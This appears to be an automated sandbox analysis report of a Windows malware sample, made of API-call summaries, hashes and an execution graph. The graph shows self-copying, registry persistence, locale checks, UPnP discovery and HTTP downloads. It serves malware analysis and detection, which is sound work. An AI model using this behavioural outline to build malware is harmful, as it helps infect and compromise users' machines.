                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Send$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 2121970615-0
                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    • Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                    • Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                    Function 00406FE0 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                    • String ID:
                                                                    • API String ID: 459949847-0
                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                    Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFreeInstanceString
                                                                    • String ID: Microsoft Corporation
                                                                    • API String ID: 586785272-3838278685
                                                                    • Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                    • Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                    Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                    • String ID: %S%S
                                                                    • API String ID: 1017111014-3267608656
                                                                    • Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                    • Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                    Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                    • String ID: TCP$UDP
                                                                    • API String ID: 1519345861-1097902612
                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                    Function 0040D250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait
                                                                    • String ID: .Mw
                                                                    • API String ID: 528846559-2453323595
                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95
                                                                    Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 469056452-0
                                                                    • Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                    • Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

                                                                    Execution Graph

                                                                    Execution Coverage:21%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1444
                                                                    Total number of Limit Nodes:26
                                                                    execution_graph 6034 40e121 6036 40e12a 6034->6036 6035 40e21d 6036->6035 6037 40e193 lstrcmpiW 6036->6037 6038 40e213 SysFreeString 6037->6038 6039 40e1a6 6037->6039 6038->6035 6040 40df10 2 API calls 6039->6040 6042 40e1b4 6040->6042 6041 40e205 6041->6038 6042->6038 6042->6041 6043 40e1e3 lstrcmpiW 6042->6043 6044 40e1f5 6043->6044 6045 40e1fb SysFreeString 6043->6045 6044->6045 6045->6041 5916 406045 5918 405fbe 5916->5918 5917 40604a LeaveCriticalSection 5918->5917 5919 40a220 8 API calls 5918->5919 5920 40601c 5919->5920 5920->5917 5921 407b49 5922 407b52 5921->5922 5923 407b61 34 API calls 5922->5923 5924 408996 5922->5924 5925 40a28e 5926 40a1b0 __aligned_recalloc_base 3 API calls 5925->5926 5928 40a24d 5926->5928 5927 409fa0 __aligned_recalloc_base 7 API calls 5927->5928 5928->5927 5929 40a262 5928->5929 5930 40a264 memcpy 5928->5930 5930->5928 4357 407590 Sleep CreateMutexA GetLastError 4358 4075c6 ExitProcess 4357->4358 4359 4075ce 6 API calls 4357->4359 4360 407673 4359->4360 4361 40795a Sleep 4359->4361 4499 40e730 GetLocaleInfoA strcmp 4360->4499 4413 40c7d0 4361->4413 4366 407680 ExitProcess 4367 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4370 407779 Sleep wsprintfW CopyFileW 4367->4370 4371 4076dc SetFileAttributesW RegOpenKeyExW 4367->4371 4368 407ae1 4369 407975 9 API calls 4416 405bc0 InitializeCriticalSection CreateFileW 4369->4416 5702 407440 4369->5702 5709 405880 4369->5709 5718 406bc0 Sleep GetModuleFileNameW 4369->5718 4374 4077c1 SetFileAttributesW RegOpenKeyExW 4370->4374 4375 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4370->4375 4371->4370 4373 407718 wcslen RegSetValueExW 4371->4373 4373->4370 4378 40774d RegCloseKey 4373->4378 4374->4375 4379 4077fd wcslen RegSetValueExW 4374->4379 4375->4361 4377 4078bd SetFileAttributesW RegOpenKeyExW 4375->4377 4377->4361 4381 4078f9 wcslen RegSetValueExW 4377->4381 4501 40e980 memset memset CreateProcessW 4378->4501 4379->4375 4383 407832 RegCloseKey 4379->4383 4381->4361 4385 40792e RegCloseKey 4381->4385 4387 40e980 6 API calls 4383->4387 4390 40e980 6 API calls 4385->4390 4392 40784b 4387->4392 4389 407a2a CreateEventA 4447 40bf00 4389->4447 4394 407947 4390->4394 4391 407771 ExitProcess 4392->4375 4395 407856 ExitProcess 4392->4395 4394->4361 4397 407952 ExitProcess 4394->4397 4404 40d160 328 API calls 4405 407a8a 4404->4405 4406 40d160 328 API calls 4405->4406 4407 407aa6 4406->4407 4408 40d160 328 API calls 4407->4408 4409 407ac2 4408->4409 4490 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4409->4490 4411 407ad2 4507 40d410 4411->4507 4515 40c7a0 4413->4515 4417 405ce5 4416->4417 4418 405bf8 CreateFileMappingW 4416->4418 4429 40d640 CoInitializeEx 4417->4429 4419 405c19 MapViewOfFile 4418->4419 4420 405cd1 4418->4420 4419->4420 4421 405c38 GetFileSize 4419->4421 4420->4417 4428 405c4d 4421->4428 4422 405cc7 UnmapViewOfFile 4422->4420 4424 405c5c 4424->4422 4425 405c8c 4426 40a1b0 __aligned_recalloc_base 3 API calls 4425->4426 4426->4424 4428->4422 4428->4424 4428->4425 4644 40c820 4428->4644 4651 405cf0 4428->4651 4956 40d710 socket 4429->4956 4431 407a25 4442 406fe0 CoInitializeEx SysAllocString 4431->4442 4432 40d6e8 5000 40a2d0 4432->5000 4435 40d6aa 4981 40aa80 htons 4435->4981 4436 40d660 4436->4431 4436->4432 4436->4435 4966 40d980 4436->4966 4441 40e470 24 API calls 4441->4432 4443 407002 4442->4443 4444 407018 CoUninitialize 4442->4444 5145 407030 4443->5145 4444->4389 5154 40bec0 4447->5154 4450 40bec0 3 API calls 4451 40bf1e 4450->4451 4452 40bec0 3 API calls 4451->4452 4453 40bf2e 4452->4453 4454 40bec0 3 API calls 4453->4454 4455 407a42 4454->4455 4456 40d130 4455->4456 4457 409d90 7 API calls 4456->4457 4458 40d13b 4457->4458 4459 407a4c 4458->4459 4460 40d147 InitializeCriticalSection 4458->4460 4461 40b2c0 InitializeCriticalSection 4459->4461 4460->4459 4463 40b2da 4461->4463 4462 40b309 CreateFileW 4465 40b330 CreateFileMappingW 4462->4465 4470 40b3de 4462->4470 4463->4462 5161 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4463->5161 5162 40aea0 4463->5162 4466 40b351 MapViewOfFile 4465->4466 4465->4470 4469 40b36c GetFileSize 4466->4469 4466->4470 4476 40b38b 4469->4476 5209 40ab60 EnterCriticalSection 4470->5209 4471 40b3f7 4472 40d160 328 API calls 4471->4472 4473 407a56 4472->4473 4478 40d160 4473->4478 4474 40b3d4 UnmapViewOfFile 4474->4470 4476->4474 4477 40aea0 31 API calls 4476->4477 5212 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4476->5212 4477->4476 4479 40d177 EnterCriticalSection 4478->4479 4480 407a6f 4478->4480 5237 40d250 4479->5237 4480->4404 4483 40d23b LeaveCriticalSection 4483->4480 4484 409fe0 9 API calls 4485 40d1b9 4484->4485 4485->4483 4486 40d1cb CreateThread 4485->4486 4486->4483 4487 40d1ee 4486->4487 5241 40d550 4486->5241 5251 401f50 GetQueuedCompletionStatus 4486->5251 5258 40d5f0 4486->5258 5264 40cf00 4486->5264 5271 40b420 4486->5271 5277 401920 GetTickCount WaitForSingleObject 4486->5277 5300 40ceb0 4486->5300 4488 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4487->4488 4489 40d234 4487->4489 4488->4489 4489->4483 4491 40d306 InterlockedExchangeAdd 4490->4491 4492 40d3e9 GetCurrentThread SetThreadPriority 4490->4492 4491->4492 4498 40d320 4491->4498 4492->4411 4493 40d339 EnterCriticalSection 4493->4498 4494 40d3a7 LeaveCriticalSection 4496 40d3be 4494->4496 4494->4498 4495 40d383 WaitForSingleObject 4495->4498 4496->4492 4497 40d3dc Sleep 4497->4498 4498->4492 4498->4493 4498->4494 4498->4495 4498->4496 4498->4497 4500 407678 4499->4500 4500->4366 4500->4367 4502 40e9f1 ShellExecuteW 4501->4502 4503 40e9e2 Sleep 4501->4503 4505 40ea26 4502->4505 4506 40ea17 Sleep 4502->4506 4504 407766 4503->4504 4504->4370 4504->4391 4505->4504 4506->4504 4508 40d41c EnterCriticalSection 4507->4508 4514 40d492 4507->4514 4511 40d438 LeaveCriticalSection DeleteCriticalSection 4508->4511 4510 40a1b0 __aligned_recalloc_base 3 API calls 4512 40d486 4510->4512 4511->4510 4513 40a1b0 __aligned_recalloc_base 3 API calls 4512->4513 4513->4514 4514->4368 4518 40c3f0 4515->4518 4519 40c423 4518->4519 4520 40c40e 4518->4520 4523 40796a 4519->4523 4524 40c5d0 4519->4524 4558 40c450 4520->4558 4523->4368 4523->4369 4525 40c5f9 4524->4525 4526 40c6aa 4524->4526 4527 40c6a2 4525->4527 4584 409d90 4525->4584 4526->4527 4530 409d90 7 API calls 4526->4530 4527->4523 4531 40c6ce 4530->4531 4531->4527 4534 402420 7 API calls 4531->4534 4536 40c6f2 4534->4536 4535 409d90 7 API calls 4537 40c642 4535->4537 4538 409d90 7 API calls 4536->4538 4592 4024e0 4537->4592 4540 40c701 4538->4540 4542 4024e0 10 API calls 4540->4542 4541 40c66b 4595 40a1b0 4541->4595 4544 40c72a 4542->4544 4546 40a1b0 __aligned_recalloc_base 3 API calls 4544->4546 4548 40c736 4546->4548 4547 402420 7 API calls 4550 40c688 4547->4550 4549 402420 7 API calls 4548->4549 4551 40c747 4549->4551 4552 4024e0 10 API calls 4550->4552 4553 4024e0 10 API calls 4551->4553 4552->4527 4554 40c761 4553->4554 4555 402420 7 API calls 4554->4555 4556 40c772 4555->4556 4557 4024e0 10 API calls 4556->4557 4557->4527 4559 40c502 4558->4559 4560 40c479 4558->4560 4562 409d90 7 API calls 4559->4562 4583 40c4fa 4559->4583 4561 409d90 7 API calls 4560->4561 4560->4583 4563 40c48c 4561->4563 4564 40c528 4562->4564 4565 402420 7 API calls 4563->4565 4563->4583 4566 402420 7 API calls 4564->4566 4564->4583 4567 40c4b5 4565->4567 4568 40c555 4566->4568 4569 4024e0 10 API calls 4567->4569 4570 4024e0 10 API calls 4568->4570 4571 40c4cf 4569->4571 4572 40c56f 4570->4572 4573 402420 7 API calls 4571->4573 4574 402420 7 API calls 4572->4574 4575 40c4e0 4573->4575 4576 40c580 4574->4576 4577 4024e0 10 API calls 4575->4577 4578 4024e0 10 API calls 4576->4578 4577->4583 4579 40c59a 4578->4579 4580 402420 7 API calls 4579->4580 4581 40c5ab 4580->4581 4582 4024e0 10 API calls 4581->4582 4582->4583 4583->4523 4602 409db0 4584->4602 4587 402420 4623 409fa0 4587->4623 4630 402540 4592->4630 4594 4024ff __aligned_recalloc_base 4594->4541 4640 409e50 GetCurrentProcessId 4595->4640 4597 40a1bb 4598 40a1c2 4597->4598 4641 40a0f0 4597->4641 4598->4547 4601 40a1d7 RtlFreeHeap 4601->4598 4611 409e50 GetCurrentProcessId 4602->4611 4604 409dbb 4605 409dc7 __aligned_recalloc_base 4604->4605 4612 409e70 4604->4612 4607 409d9e 4605->4607 4608 409de2 RtlAllocateHeap 4605->4608 4607->4527 4607->4587 4608->4607 4609 409e09 __aligned_recalloc_base 4608->4609 4609->4607 4610 409e24 memset 4609->4610 4610->4607 4611->4604 4620 409e50 GetCurrentProcessId 4612->4620 4614 409e79 4615 409e96 HeapCreate 4614->4615 4621 409ee0 GetProcessHeaps 4614->4621 4616 409eb0 HeapSetInformation GetCurrentProcessId 4615->4616 4617 409ed7 4615->4617 4616->4617 4617->4605 4620->4614 4622 409e8c 4621->4622 4622->4615 4622->4617 4624 409db0 __aligned_recalloc_base 7 API calls 4623->4624 4625 40242b 4624->4625 4626 402820 4625->4626 4627 40282a 4626->4627 4628 409fa0 __aligned_recalloc_base 7 API calls 4627->4628 4629 402438 4628->4629 4629->4535 4631 40258e 4630->4631 4633 402551 4630->4633 4632 409fa0 __aligned_recalloc_base 7 API calls 4631->4632 4631->4633 4635 4025b2 _invalid_parameter 4632->4635 4633->4594 4634 4025e2 memcpy 4636 402606 _invalid_parameter 4634->4636 4635->4634 4637 40a1b0 __aligned_recalloc_base 3 API calls 4635->4637 4638 40a1b0 __aligned_recalloc_base 3 API calls 4636->4638 4639 4025df 4637->4639 4638->4633 4639->4634 4640->4597 4642 40a120 HeapValidate 4641->4642 4643 40a140 4641->4643 4642->4643 4643->4598 4643->4601 4661 40a220 4644->4661 4649 40a1b0 __aligned_recalloc_base 3 API calls 4650 40c861 4649->4650 4650->4428 4874 409fe0 4651->4874 4654 405d2a memcpy 4656 40a220 8 API calls 4654->4656 4655 405de8 4655->4428 4657 405d61 4656->4657 4884 40c190 4657->4884 4662 40a24d 4661->4662 4663 409fa0 __aligned_recalloc_base 7 API calls 4662->4663 4664 40a262 4662->4664 4665 40a264 memcpy 4662->4665 4663->4662 4664->4650 4666 40bd30 4664->4666 4665->4662 4668 40bd3a 4666->4668 4670 40bd71 memcmp 4668->4670 4671 40bd98 4668->4671 4673 40a1b0 __aligned_recalloc_base 3 API calls 4668->4673 4674 40bd59 4668->4674 4675 40c220 4668->4675 4689 407af0 4668->4689 4670->4668 4672 40a1b0 __aligned_recalloc_base 3 API calls 4671->4672 4672->4674 4673->4668 4674->4649 4674->4650 4676 40c22f __aligned_recalloc_base 4675->4676 4677 409fa0 __aligned_recalloc_base 7 API calls 4676->4677 4679 40c239 4676->4679 4678 40c2c8 4677->4678 4678->4679 4680 402420 7 API calls 4678->4680 4679->4668 4681 40c2dd 4680->4681 4682 402420 7 API calls 4681->4682 4683 40c2e5 4682->4683 4685 40c33d __aligned_recalloc_base 4683->4685 4692 40c390 4683->4692 4697 402470 4685->4697 4688 402470 3 API calls 4688->4679 4805 409d10 4689->4805 4693 4024e0 10 API calls 4692->4693 4694 40c3a4 4693->4694 4703 4026f0 4694->4703 4696 40c3bc 4696->4683 4699 402484 _invalid_parameter 4697->4699 4700 4024ce 4697->4700 4698 40a1b0 __aligned_recalloc_base 3 API calls 4698->4700 4701 40a1b0 __aligned_recalloc_base 3 API calls 4699->4701 4702 4024ac 4699->4702 4700->4688 4701->4702 4702->4698 4706 402710 4703->4706 4705 40270a 4705->4696 4707 402724 4706->4707 4708 402540 __aligned_recalloc_base 10 API calls 4707->4708 4709 40276d 4708->4709 4710 402540 __aligned_recalloc_base 10 API calls 4709->4710 4711 40277d 4710->4711 4712 402540 __aligned_recalloc_base 10 API calls 4711->4712 4713 40278d 4712->4713 4714 402540 __aligned_recalloc_base 10 API calls 4713->4714 4715 40279d 4714->4715 4716 4027a6 4715->4716 4717 4027cf 4715->4717 4721 403e20 4716->4721 4738 403df0 4717->4738 4720 4027c7 __aligned_recalloc_base 4720->4705 4722 402820 _invalid_parameter 7 API calls 4721->4722 4723 403e37 4722->4723 4724 402820 _invalid_parameter 7 API calls 4723->4724 4725 403e46 4724->4725 4726 402820 _invalid_parameter 7 API calls 4725->4726 4727 403e55 4726->4727 4728 402820 _invalid_parameter 7 API calls 4727->4728 4729 403e64 _invalid_parameter __aligned_recalloc_base 4728->4729 4731 40400f _invalid_parameter 4729->4731 4741 402850 4729->4741 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404035 _invalid_parameter 4731->4733 4732->4731 4734 402850 _invalid_parameter 3 API calls 4733->4734 4735 40405b _invalid_parameter 4733->4735 4734->4733 4736 402850 _invalid_parameter 3 API calls 4735->4736 4737 404081 4735->4737 4736->4735 4737->4720 4745 404090 4738->4745 4740 403e0c 4740->4720 4742 402866 4741->4742 4743 40285b 4741->4743 4742->4729 4744 40a1b0 __aligned_recalloc_base 3 API calls 4743->4744 4744->4742 4746 4040a6 